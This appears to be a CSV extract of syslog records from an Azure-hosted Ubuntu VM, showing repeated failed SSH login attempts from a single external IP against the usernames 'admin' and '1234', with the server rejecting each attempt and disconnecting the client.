+1617,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:47:39,UbuntuDevEnv,2019-06-28 04:47:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1618,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:47:41,UbuntuDevEnv,2019-06-28 04:47:41,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 26785 ssh2,86834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,26785,,
+1619,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:47:41,UbuntuDevEnv,2019-06-28 04:47:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1620,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:47:44,UbuntuDevEnv,2019-06-28 04:47:44,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user admin from 193.201.224.232 port 26785 ssh2 [preauth],86834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,26785,,
+1621,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:47:44,UbuntuDevEnv,2019-06-28 04:47:44,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,86834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1622,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:47:44,UbuntuDevEnv,2019-06-28 04:47:44,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 26785 ssh2,86834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,26785,,
+1623,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:47:44,UbuntuDevEnv,2019-06-28 04:47:44,auth,UbuntuDevEnv,info,Disconnecting invalid user admin 193.201.224.232 port 26785: Too many authentication failures [preauth],86834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,26785,,
+1624,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:47:44,UbuntuDevEnv,2019-06-28 04:47:44,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,86834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1625,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:48:01,UbuntuDevEnv,2019-06-28 04:48:01,auth,UbuntuDevEnv,info,Invalid user admin from 193.201.224.232 port 11256,86986,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,11256,,
+1626,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:48:02,UbuntuDevEnv,2019-06-28 04:48:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86986,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1627,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:48:02,UbuntuDevEnv,2019-06-28 04:48:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,86986,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1628,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:48:04,UbuntuDevEnv,2019-06-28 04:48:03,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 11256 ssh2,86986,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,11256,,
+1629,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:48:08,UbuntuDevEnv,2019-06-28 04:48:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86986,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1630,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:48:10,UbuntuDevEnv,2019-06-28 04:48:09,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 11256 ssh2,86986,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,11256,,
+1631,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:48:11,UbuntuDevEnv,2019-06-28 04:48:10,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86986,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1632,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:48:12,UbuntuDevEnv,2019-06-28 04:48:12,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 11256 ssh2,86986,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,11256,,
+1633,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:48:22,UbuntuDevEnv,2019-06-28 04:48:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86986,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1634,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:48:23,UbuntuDevEnv,2019-06-28 04:48:23,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 11256 ssh2,86986,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,11256,,
+1635,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:48:24,UbuntuDevEnv,2019-06-28 04:48:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86986,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1636,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:48:26,UbuntuDevEnv,2019-06-28 04:48:25,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 11256 ssh2,86986,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,11256,,
+1637,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:48:26,UbuntuDevEnv,2019-06-28 04:48:25,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86986,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1638,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:48:28,UbuntuDevEnv,2019-06-28 04:48:28,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user admin from 193.201.224.232 port 11256 ssh2 [preauth],86986,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,11256,,
+1639,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:48:28,UbuntuDevEnv,2019-06-28 04:48:28,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,86986,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1640,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:48:28,UbuntuDevEnv,2019-06-28 04:48:28,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,86986,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1641,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:48:28,UbuntuDevEnv,2019-06-28 04:48:28,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 11256 ssh2,86986,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,11256,,
+1642,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:48:28,UbuntuDevEnv,2019-06-28 04:48:28,auth,UbuntuDevEnv,info,Disconnecting invalid user admin 193.201.224.232 port 11256: Too many authentication failures [preauth],86986,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,11256,,
+1643,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:49:16,UbuntuDevEnv,2019-06-28 04:49:16,auth,UbuntuDevEnv,info,Invalid user admin from 193.201.224.232 port 17423,87259,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,17423,,
+1644,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:49:18,UbuntuDevEnv,2019-06-28 04:49:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,87259,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1645,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:49:18,UbuntuDevEnv,2019-06-28 04:49:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,87259,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1646,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:49:20,UbuntuDevEnv,2019-06-28 04:49:20,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 17423 ssh2,87259,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,17423,,
+1647,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:49:20,UbuntuDevEnv,2019-06-28 04:49:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,87259,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1648,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:49:22,UbuntuDevEnv,2019-06-28 04:49:21,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 17423 ssh2,87259,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,17423,,
+1649,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:49:22,UbuntuDevEnv,2019-06-28 04:49:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,87259,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1650,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:49:23,UbuntuDevEnv,2019-06-28 04:49:23,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 17423 ssh2,87259,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,17423,,
+1651,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:49:24,UbuntuDevEnv,2019-06-28 04:49:24,authpriv,UbuntuDevEnv,notice,PAM 2 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,87259,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1652,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:49:24,UbuntuDevEnv,2019-06-28 04:49:24,auth,UbuntuDevEnv,info,"Disconnecting invalid user admin 193.201.224.232 port 17423: Change of username or service not allowed: (admin,ssh-connection) -> (1234,ssh-connection) [preauth]",87259,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,17423,,
+1653,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:49:30,UbuntuDevEnv,2019-06-28 04:49:29,auth,UbuntuDevEnv,info,Invalid user 1234 from 193.201.224.232 port 25713,87302,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,1234,193.201.224.2,25713,,
+1654,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:49:31,UbuntuDevEnv,2019-06-28 04:49:30,auth,UbuntuDevEnv,info,Failed none for invalid user 1234 from 193.201.224.232 port 25713 ssh2,87302,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,1234,193.201.224.2,25713,,
+1655,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:49:31,UbuntuDevEnv,2019-06-28 04:49:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,87302,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1656,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:49:31,UbuntuDevEnv,2019-06-28 04:49:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,87302,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1657,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:49:34,UbuntuDevEnv,2019-06-28 04:49:33,auth,UbuntuDevEnv,info,Failed password for invalid user 1234 from 193.201.224.232 port 25713 ssh2,87302,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,1234,193.201.224.2,25713,,
+1658,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:49:34,UbuntuDevEnv,2019-06-28 04:49:33,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,87302,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1659,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:49:36,UbuntuDevEnv,2019-06-28 04:49:35,auth,UbuntuDevEnv,info,Failed password for invalid user 1234 from 193.201.224.232 port 25713 ssh2,87302,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,1234,193.201.224.2,25713,,
+1660,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:49:36,UbuntuDevEnv,2019-06-28 04:49:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,87302,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1661,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:49:38,UbuntuDevEnv,2019-06-28 04:49:37,auth,UbuntuDevEnv,info,Failed password for invalid user 1234 from 193.201.224.232 port 25713 ssh2,87302,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,1234,193.201.224.2,25713,,
+1662,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:49:39,UbuntuDevEnv,2019-06-28 04:49:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,87302,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1663,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:49:41,UbuntuDevEnv,2019-06-28 04:49:40,auth,UbuntuDevEnv,info,Failed password for invalid user 1234 from 193.201.224.232 port 25713 ssh2,87302,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,1234,193.201.224.2,25713,,
+1664,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:49:41,UbuntuDevEnv,2019-06-28 04:49:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,87302,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1665,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:49:43,UbuntuDevEnv,2019-06-28 04:49:43,auth,UbuntuDevEnv,info,Disconnecting invalid user 1234 193.201.224.232 port 25713: Too many authentication failures [preauth],87302,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,1234,193.201.224.2,25713,,
+1666,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:49:43,UbuntuDevEnv,2019-06-28 04:49:43,auth,UbuntuDevEnv,info,Failed password for invalid user 1234 from 193.201.224.232 port 25713 ssh2,87302,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,1234,193.201.224.2,25713,,
+1667,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:49:43,UbuntuDevEnv,2019-06-28 04:49:43,authpriv,UbuntuDevEnv,notice,PAM 4 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,87302,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1668,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:49:43,UbuntuDevEnv,2019-06-28 04:49:43,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  5 > 3,87302,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1669,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:49:43,UbuntuDevEnv,2019-06-28 04:49:43,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user 1234 from 193.201.224.232 port 25713 ssh2 [preauth],87302,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,1234,193.201.224.2,25713,,
+1670,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:50:35,UbuntuDevEnv,2019-06-28 04:50:35,auth,UbuntuDevEnv,info,Invalid user 1234 from 193.201.224.232 port 18634,87543,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,1234,193.201.224.2,18634,,
+1671,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:50:36,UbuntuDevEnv,2019-06-28 04:50:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,87543,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1672,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:50:36,UbuntuDevEnv,2019-06-28 04:50:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,87543,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1673,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:50:38,UbuntuDevEnv,2019-06-28 04:50:37,auth,UbuntuDevEnv,info,Failed password for invalid user 1234 from 193.201.224.232 port 18634 ssh2,87543,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,1234,193.201.224.2,18634,,
+1674,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:50:38,UbuntuDevEnv,2019-06-28 04:50:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,87543,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1675,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:50:40,UbuntuDevEnv,2019-06-28 04:50:40,auth,UbuntuDevEnv,info,Failed password for invalid user 1234 from 193.201.224.232 port 18634 ssh2,87543,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,1234,193.201.224.2,18634,,
+1676,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:50:44,UbuntuDevEnv,2019-06-28 04:50:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,87543,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
